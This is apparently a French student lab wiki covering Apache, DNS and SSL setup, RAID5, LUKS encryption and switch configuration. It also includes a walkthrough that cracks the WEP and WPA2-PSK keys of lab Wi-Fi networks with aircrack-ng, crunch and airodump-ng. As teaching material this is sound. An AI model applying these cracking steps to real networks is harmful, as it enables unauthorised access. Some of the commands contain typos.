Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sdb1'''&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sdb1&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1):&lt;br /&gt;
First sector (2048-1953525167, default 2048):&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size xxxx.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
La clef est prête, on peut desormais crypter avec l'utilitaire cyptsetup &lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb1&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb1 clef_ima2a_G5&lt;br /&gt;
    mkfs.ext4 /dev/mapper/clef_ima2a_G5&lt;br /&gt;
    mount -t ext4 /dev/mapper/clef_ima2a_G5 /mnt/clef&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
